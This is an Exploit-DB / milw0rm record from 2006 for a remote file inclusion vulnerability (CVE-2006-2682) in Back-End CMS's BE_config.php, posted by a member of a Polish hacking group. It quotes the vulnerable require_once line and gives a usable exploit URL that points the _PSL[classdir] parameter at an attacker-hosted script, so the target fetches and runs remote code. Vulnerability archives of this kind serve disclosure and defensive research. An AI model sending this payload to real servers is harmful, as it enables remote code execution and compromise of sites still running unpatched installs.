Back-End CMS <= 0.7.2.2 BE_config.php Remote Include Vulnerability

2006-05-25T00:00:00
ID EDB-ID:1825
Type exploitdb
Reporter Kacper
Modified 2006-05-25T00:00:00

Description

Back-End CMS <= 0.7.2.2 (BE_config.php) Remote Include Vulnerability. CVE-2006-2682. Webapps exploit for php platform

                                        
                                            ################# DEVIL TEAM THE BEST POLISH TEAM ##################
#
#   Back-End CMS - Remote File Include Vulnerabilities
#   Find by Kacper (Rahim).
#   Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#   Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
#   Site of script: http://www.back-end.org
#
####################################################################
*/

BE_config.php Line 27-31:

[code]
...
  // Script timer
  require_once($_PSL['classdir'] . '/BE_phpTimer.class');
  $scriptTimer = & pslSingleton('phpTimer');
  $scriptTimer-&gt;start('main');
  /* Use Example
...
[/code]


/*

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.site.com/[Back-End_path]/BE_config.php?_PSL[classdir]=[evil_scripts]

#Elo ;-)

# milw0rm.com [2006-05-25]